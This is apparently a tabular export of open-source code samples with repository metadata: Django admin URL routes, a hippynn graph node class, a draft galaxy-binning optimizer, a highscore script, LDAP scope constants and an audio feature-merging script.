re_path(r'^$', views.admin_home_view, name='admin_home',),
re_path(r'^data_cleanup/$', views.data_cleanup_view, name='data_cleanup'),
re_path(r'^data_cleanup_organization_analysis/$',
views.data_cleanup_organization_analysis_view, name='data_cleanup_organization_analysis'),
re_path(r'^data_cleanup_organization_list_analysis/$',
views.data_cleanup_organization_list_analysis_view, name='data_cleanup_organization_list_analysis'),
re_path(r'^data_cleanup_position_list_analysis/$',
views.data_cleanup_position_list_analysis_view, name='data_cleanup_position_list_analysis'),
re_path(r'^data_cleanup_voter_hanging_data_process/$',
views.data_cleanup_voter_hanging_data_process_view, name='data_cleanup_voter_hanging_data_process'),
re_path(r'^data_cleanup_voter_list_analysis/$',
views.data_cleanup_voter_list_analysis_view, name='data_cleanup_voter_list_analysis'),
re_path(r'^data_voter_statistics/$', views.data_voter_statistics_view, name='data_voter_statistics'),
re_path(r'^import_sample_data/$', views.import_sample_data_view, name='import_sample_data'),
re_path(r'^statistics/$', views.statistics_summary_view, name='statistics_summary'),
re_path(r'^sync_dashboard/$', views.sync_data_with_master_servers_view, name='sync_dashboard'),
]
| en | 0.869473 | # admin_tools/urls.py # Brought to you by We Vote. Be good. # -*- coding: UTF-8 -*- | 1.65709 | 2 |
hippynn/graphs/nodes/base/multi.py | tautomer/hippynn | 21 | 8094 | """
A base node that provides several output tensors.
"""
from ....layers.algebra import Idx
from .base import SingleNode, Node
from .. import _debprint
from ...indextypes import IdxType
class IndexNode(SingleNode):
_input_names = ("parent",)
def __init__(self, name, parents, index, index_state=None):
if len(parents) != 1:
raise TypeError("Index node takes exactly one parent.")
par = parents[0]
iname = par._output_names[index] if hasattr(par, "_output_names") else "<{index}>".format(index=index)
repr_info = {"parent_name": par.name, "index": iname}
module = Idx(index, repr_info=repr_info)
self.index = index
self._index_state = IdxType.NotFound if index_state is None else index_state
super().__init__(name, parents, module=module)
class MultiNode(Node): # Multinode
_output_names = NotImplemented
_output_index_states = NotImplemented # optional?
_main_output = NotImplemented
def __init__(self, name, parents, module="auto", *args, db_name=None, **kwargs):
super().__init__(name, parents, *args, module=module, **kwargs)
self.children = tuple(
IndexNode(name + "." + cn, (self,), index=i, index_state=cidx)
for i, (cn, cidx) in enumerate(zip(self._output_names, self._output_index_states))
)
self.main_output.db_name = db_name
def set_dbname(self, db_name):
self.main_output.set_dbname(db_name)
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
# Enforce _child_index_states has same length as _output_names
if cls._output_index_states is not NotImplemented:
if len(cls._output_index_states) != len(cls._output_names):
raise AssertionError(
"Lengths of _child_index_states {} doesn't match lengths of ouput_names {}".format(
cls._output_index_states, cls._output_names
)
)
# Enforce no name conflict between input names and output names
if cls._input_names is not NotImplemented:
try:
assert all(o not in cls._input_names for o in cls._output_names)
except AssertionError as ae:
raise ValueError(
"Multi-node output names {} conflict with input names {}".format(
cls._output_names, cls._input_names
)
) from ae
def __dir__(self):
dir_ = super().__dir__()
if self._output_names is not NotImplemented:
dir_ = dir_ + list(self._output_names)
return dir_
def __getattr__(self, item):
if item in ("children", "_output_names"): # Guard against recursion
raise AttributeError("Attribute {} not yet present.".format(item))
try:
return super().__getattr__(item) # Defer to BaseNode first
except AttributeError:
pass
try:
return self.children[self._output_names.index(item)]
except (AttributeError, ValueError):
raise AttributeError("{} object has no attribute '{}'".format(self.__class__, item))
@property
def main_output(self):
if self._main_output is NotImplemented:
return super().main_output
return getattr(self, self._main_output)
| """
A base node that provides several output tensors.
"""
from ....layers.algebra import Idx
from .base import SingleNode, Node
from .. import _debprint
from ...indextypes import IdxType
class IndexNode(SingleNode):
_input_names = ("parent",)
def __init__(self, name, parents, index, index_state=None):
if len(parents) != 1:
raise TypeError("Index node takes exactly one parent.")
par = parents[0]
iname = par._output_names[index] if hasattr(par, "_output_names") else "<{index}>".format(index=index)
repr_info = {"parent_name": par.name, "index": iname}
module = Idx(index, repr_info=repr_info)
self.index = index
self._index_state = IdxType.NotFound if index_state is None else index_state
super().__init__(name, parents, module=module)
class MultiNode(Node): # Multinode
_output_names = NotImplemented
_output_index_states = NotImplemented # optional?
_main_output = NotImplemented
def __init__(self, name, parents, module="auto", *args, db_name=None, **kwargs):
super().__init__(name, parents, *args, module=module, **kwargs)
self.children = tuple(
IndexNode(name + "." + cn, (self,), index=i, index_state=cidx)
for i, (cn, cidx) in enumerate(zip(self._output_names, self._output_index_states))
)
self.main_output.db_name = db_name
def set_dbname(self, db_name):
self.main_output.set_dbname(db_name)
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
# Enforce _child_index_states has same length as _output_names
if cls._output_index_states is not NotImplemented:
if len(cls._output_index_states) != len(cls._output_names):
raise AssertionError(
"Lengths of _child_index_states {} doesn't match lengths of ouput_names {}".format(
cls._output_index_states, cls._output_names
)
)
# Enforce no name conflict between input names and output names
if cls._input_names is not NotImplemented:
try:
assert all(o not in cls._input_names for o in cls._output_names)
except AssertionError as ae:
raise ValueError(
"Multi-node output names {} conflict with input names {}".format(
cls._output_names, cls._input_names
)
) from ae
def __dir__(self):
dir_ = super().__dir__()
if self._output_names is not NotImplemented:
dir_ = dir_ + list(self._output_names)
return dir_
def __getattr__(self, item):
if item in ("children", "_output_names"): # Guard against recursion
raise AttributeError("Attribute {} not yet present.".format(item))
try:
return super().__getattr__(item) # Defer to BaseNode first
except AttributeError:
pass
try:
return self.children[self._output_names.index(item)]
except (AttributeError, ValueError):
raise AttributeError("{} object has no attribute '{}'".format(self.__class__, item))
@property
def main_output(self):
if self._main_output is NotImplemented:
return super().main_output
return getattr(self, self._main_output)
| en | 0.850411 | A base node that provides several output tensors. # Multinode # optional? # Enforce _child_index_states has same length as _output_names # Enforce no name conflict between input names and output names # Guard against recursion # Defer to BaseNode first | 2.425441 | 2 |
main_module/__init__.py | JohanNicander/python-test-architecture | 0 | 8095 | from .zero import zero
from main_module._unittester import UnitTester
test = UnitTester(__name__)
del UnitTester | from .zero import zero
from main_module._unittester import UnitTester
test = UnitTester(__name__)
del UnitTester | none | 1 | 1.329398 | 1 |
|
barber/cutter.py | LSSTDESC/barber | 0 | 8096 | import numpy as np
import numpy.random as npr
import scipy.optimize as spo
import tomo_challenge.metrics as tcm
# custom data type, could be replaced with/tie in to tree.py class
# cut_vals is (nfeat, nbins - 1) numpy array, float
# tree_ids is ((nbins,) * nfeat) numpy array, int
TreePars = namedtuple('TreePars', ['cut_vals', 'tree_ids'])
# should maybe put this function in a class so we can call TreePars.to_array
def treepars_to_array(treepars):
"""
Flattens cut_vals and tree_ids for optimizer
"""
cuts = np.flatten(treepars.cut_vals)
ids = np.flatten(treepars.tree_ids)
arr = np.concatenate((cuts, ids))
return(arr)
# should maybe put this function in a class so we can call TreePars.from_array
def array_to_treepars(arr):
"""
Converts optimizer format of 1D array back into namedtuple of arrays
"""
flat_cuts = arr[type(arr) == float]
flat_ids = arr[type(arr) == int]
nbins = len(np.unique(flat_ids))
nfeat = len(flat_cuts) / (nbins - 1)
# maybe do some assert checks with these just in case types have problems
# cuts = arr[0:nfeat*(nbins-1)].reshape((nfeat, nbins-1))
# ids = arr[feat*(nbins-1):].reshape((nbins,) * nfeat)
cuts = flat_cuts.reshape((nfeat, nbins-1))
ids = flat_ids.reshape((nbins,) * nfeat)
treepars = TreePars(cuts, ids)
return(treepars)
def get_cuts(galaxies, ival_treepars=None, nbins=3):
"""
Obtains simplest possible bin definitions: cuts in the space of observables given number of bins
Parameters
----------
galaxies: numpy.ndarray, float
observables (magnitudes and/or colors and/or errors) to serve as features for set of galaxies
shape(galaxies) = (ngals, nfeat)
ival_treepars: namedtuple, numpy.ndarray, float and int, optional
initial values for decision tree parameters
shape(ivals.cut_vals) = (nfeat, (nbins - 1))
shape(tree_ids) = ((nbins,) * nfeat)
nbins: int, optional
number of bins for which to obtain cuts
Returns
-------
assignments: numpy.ndarray, int
bin assignment for each galaxy
shape(assignments) = (ngals, 1)
Notes
-----
`sort_gals` does the heavy lifting.
`eval_metric` will call one of the metrics from [tomo_challenge](https://github.com/LSSTDESC/tomo_challenge/blob/master/tomo_challenge/metrics.py).
The original idea for a general, non-cut-based optimizer was to have parameters equal to the (ngals) length array of ints representing the bin assignments, but that's not necessary for the simple cut-and-sweep barber and would probably break `spo.minimize`.
"""
(ngals, nfeat) = np.shape(galaxies)
if ival_treepars is None:
cut_ivals = np.quantile(galaxies, np.linspace(0., 1., nbins), axis=1)
assert(len(np.flatten(ivals)) == nbins**nfeat)
# need structure and way of making dumb version of these
tree_ids = npr.random_integers(0, nbins, nbins**nfeat)
assert(len(np.unique(tree_ids)) == nbins)
tree_ids.reshape((nfeat, nbins))
ival_treepars = TreePars(cut_ivals, tree_ids)
ivals = treepars_to_array(ival_treepars)
opt_res = spo.minimize(eval_metric, ivals, args=galaxies)
treepars = array_to_treepars(opt_res.x)
assignments = sort_gals(galaxies, treepars)
return(assignments)
def sort_gals(galaxies, tree_pars):
"""
Divides available galaxies into subsets according to a given decision tree on their observables
Parameters
----------
galaxies: nfeature x n_gal array
tree: tree object
Notes
-----
could be based on bisect, or maybe a sklearn object?
"""
pass
def eval_metric(arr, galaxies):
"""
Just calls a metric from tomo_challenge wrapped for the `spo.minimize` API
Notes
-----
Replace `tcm.metric` with actual call to one of the tomo_challenge metrics
Actually, there's a problem in that the current tomo_challenge metrics require the true redshifts...
"""
treepars = array_to_treepars(arr)
assignments = sort_gals(galaxies, treepars)
metval = tcm.metric(assignments)
return metval
| import numpy as np
import numpy.random as npr
import scipy.optimize as spo
import tomo_challenge.metrics as tcm
# custom data type, could be replaced with/tie in to tree.py class
# cut_vals is (nfeat, nbins - 1) numpy array, float
# tree_ids is ((nbins,) * nfeat) numpy array, int
TreePars = namedtuple('TreePars', ['cut_vals', 'tree_ids'])
# should maybe put this function in a class so we can call TreePars.to_array
def treepars_to_array(treepars):
"""
Flattens cut_vals and tree_ids for optimizer
"""
cuts = np.flatten(treepars.cut_vals)
ids = np.flatten(treepars.tree_ids)
arr = np.concatenate((cuts, ids))
return(arr)
# should maybe put this function in a class so we can call TreePars.from_array
def array_to_treepars(arr):
"""
Converts optimizer format of 1D array back into namedtuple of arrays
"""
flat_cuts = arr[type(arr) == float]
flat_ids = arr[type(arr) == int]
nbins = len(np.unique(flat_ids))
nfeat = len(flat_cuts) / (nbins - 1)
# maybe do some assert checks with these just in case types have problems
# cuts = arr[0:nfeat*(nbins-1)].reshape((nfeat, nbins-1))
# ids = arr[feat*(nbins-1):].reshape((nbins,) * nfeat)
cuts = flat_cuts.reshape((nfeat, nbins-1))
ids = flat_ids.reshape((nbins,) * nfeat)
treepars = TreePars(cuts, ids)
return(treepars)
def get_cuts(galaxies, ival_treepars=None, nbins=3):
"""
Obtains simplest possible bin definitions: cuts in the space of observables given number of bins
Parameters
----------
galaxies: numpy.ndarray, float
observables (magnitudes and/or colors and/or errors) to serve as features for set of galaxies
shape(galaxies) = (ngals, nfeat)
ival_treepars: namedtuple, numpy.ndarray, float and int, optional
initial values for decision tree parameters
shape(ivals.cut_vals) = (nfeat, (nbins - 1))
shape(tree_ids) = ((nbins,) * nfeat)
nbins: int, optional
number of bins for which to obtain cuts
Returns
-------
assignments: numpy.ndarray, int
bin assignment for each galaxy
shape(assignments) = (ngals, 1)
Notes
-----
`sort_gals` does the heavy lifting.
`eval_metric` will call one of the metrics from [tomo_challenge](https://github.com/LSSTDESC/tomo_challenge/blob/master/tomo_challenge/metrics.py).
The original idea for a general, non-cut-based optimizer was to have parameters equal to the (ngals) length array of ints representing the bin assignments, but that's not necessary for the simple cut-and-sweep barber and would probably break `spo.minimize`.
"""
(ngals, nfeat) = np.shape(galaxies)
if ival_treepars is None:
cut_ivals = np.quantile(galaxies, np.linspace(0., 1., nbins), axis=1)
assert(len(np.flatten(ivals)) == nbins**nfeat)
# need structure and way of making dumb version of these
tree_ids = npr.random_integers(0, nbins, nbins**nfeat)
assert(len(np.unique(tree_ids)) == nbins)
tree_ids.reshape((nfeat, nbins))
ival_treepars = TreePars(cut_ivals, tree_ids)
ivals = treepars_to_array(ival_treepars)
opt_res = spo.minimize(eval_metric, ivals, args=galaxies)
treepars = array_to_treepars(opt_res.x)
assignments = sort_gals(galaxies, treepars)
return(assignments)
def sort_gals(galaxies, tree_pars):
"""
Divides available galaxies into subsets according to a given decision tree on their observables
Parameters
----------
galaxies: nfeature x n_gal array
tree: tree object
Notes
-----
could be based on bisect, or maybe a sklearn object?
"""
pass
def eval_metric(arr, galaxies):
"""
Just calls a metric from tomo_challenge wrapped for the `spo.minimize` API
Notes
-----
Replace `tcm.metric` with actual call to one of the tomo_challenge metrics
Actually, there's a problem in that the current tomo_challenge metrics require the true redshifts...
"""
treepars = array_to_treepars(arr)
assignments = sort_gals(galaxies, treepars)
metval = tcm.metric(assignments)
return metval
| en | 0.788979 | # custom data type, could be replaced with/tie in to tree.py class # cut_vals is (nfeat, nbins - 1) numpy array, float # tree_ids is ((nbins,) * nfeat) numpy array, int # should maybe put this function in a class so we can call TreePars.to_array Flattens cut_vals and tree_ids for optimizer # should maybe put this function in a class so we can call TreePars.from_array Converts optimizer format of 1D array back into namedtuple of arrays # maybe do some assert checks with these just in case types have problems # cuts = arr[0:nfeat*(nbins-1)].reshape((nfeat, nbins-1)) # ids = arr[feat*(nbins-1):].reshape((nbins,) * nfeat) Obtains simplest possible bin definitions: cuts in the space of observables given number of bins Parameters ---------- galaxies: numpy.ndarray, float observables (magnitudes and/or colors and/or errors) to serve as features for set of galaxies shape(galaxies) = (ngals, nfeat) ival_treepars: namedtuple, numpy.ndarray, float and int, optional initial values for decision tree parameters shape(ivals.cut_vals) = (nfeat, (nbins - 1)) shape(tree_ids) = ((nbins,) * nfeat) nbins: int, optional number of bins for which to obtain cuts Returns ------- assignments: numpy.ndarray, int bin assignment for each galaxy shape(assignments) = (ngals, 1) Notes ----- `sort_gals` does the heavy lifting. `eval_metric` will call one of the metrics from [tomo_challenge](https://github.com/LSSTDESC/tomo_challenge/blob/master/tomo_challenge/metrics.py). The original idea for a general, non-cut-based optimizer was to have parameters equal to the (ngals) length array of ints representing the bin assignments, but that's not necessary for the simple cut-and-sweep barber and would probably break `spo.minimize`. # need structure and way of making dumb version of these Divides available galaxies into subsets according to a given decision tree on their observables Parameters ---------- galaxies: nfeature x n_gal array tree: tree object Notes ----- could be based on bisect, or maybe a sklearn object? Just calls a metric from tomo_challenge wrapped for the `spo.minimize` API Notes ----- Replace `tcm.metric` with actual call to one of the tomo_challenge metrics Actually, there's a problem in that the current tomo_challenge metrics require the true redshifts... | 2.460058 | 2 |
examples/transfer/highscore.py | coding-world/matrix_max7219 | 0 | 8097 | <filename>examples/transfer/highscore.py
import shelve
regal = shelve.open('score.txt')
def updateScore(neuerScore):
if('score' in regal):
score = regal['score']
if(neuerScore not in score):
score.insert(0, neuerScore)
score.sort()
ranking = score.index(neuerScore)
ranking = len(score)-ranking
else:
score = [neuerScore]
ranking = 1
print(score)
print(ranking)
regal['score'] = score
return ranking
neuerScore = int(input("Neuer HighScore: \n"))
updateScore(neuerScore) | <filename>examples/transfer/highscore.py
import shelve
regal = shelve.open('score.txt')
def updateScore(neuerScore):
if('score' in regal):
score = regal['score']
if(neuerScore not in score):
score.insert(0, neuerScore)
score.sort()
ranking = score.index(neuerScore)
ranking = len(score)-ranking
else:
score = [neuerScore]
ranking = 1
print(score)
print(ranking)
regal['score'] = score
return ranking
neuerScore = int(input("Neuer HighScore: \n"))
updateScore(neuerScore) | none | 1 | 3.386168 | 3 |
|
src/node/ext/ldap/scope.py | enfold/node.ext.ldap | 3 | 8098 | <reponame>enfold/node.ext.ldap<gh_stars>1-10
# -*- coding: utf-8 -*-
import ldap
BASE = ldap.SCOPE_BASE
ONELEVEL = ldap.SCOPE_ONELEVEL
SUBTREE = ldap.SCOPE_SUBTREE
SCOPES = [BASE, ONELEVEL, SUBTREE]
del ldap
| # -*- coding: utf-8 -*-
import ldap
BASE = ldap.SCOPE_BASE
ONELEVEL = ldap.SCOPE_ONELEVEL
SUBTREE = ldap.SCOPE_SUBTREE
SCOPES = [BASE, ONELEVEL, SUBTREE]
del ldap | en | 0.769321 | # -*- coding: utf-8 -*- | 1.491237 | 1 |
urban-sound-classification/feature_merge.py | tensorflow-korea/tfk-notebooks | 50 | 8099 | import glob
import numpy as np
X = np.empty((0, 193))
y = np.empty((0, 10))
groups = np.empty((0, 1))
npz_files = glob.glob('./urban_sound_?.npz')
for fn in npz_files:
print(fn)
data = np.load(fn)
X = np.append(X, data['X'], axis=0)
y = np.append(y, data['y'], axis=0)
groups = np.append(groups, data['groups'], axis=0)
print(groups[groups>0])
print(X.shape, y.shape)
for r in y:
if np.sum(r) > 1.5:
print(r)
np.savez('urban_sound', X=X, y=y, groups=groups)
| import glob
import numpy as np
X = np.empty((0, 193))
y = np.empty((0, 10))
groups = np.empty((0, 1))
npz_files = glob.glob('./urban_sound_?.npz')
for fn in npz_files:
print(fn)
data = np.load(fn)
X = np.append(X, data['X'], axis=0)
y = np.append(y, data['y'], axis=0)
groups = np.append(groups, data['groups'], axis=0)
print(groups[groups>0])
print(X.shape, y.shape)
for r in y:
if np.sum(r) > 1.5:
print(r)
np.savez('urban_sound', X=X, y=y, groups=groups)
| none | 1 | 2.642741 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.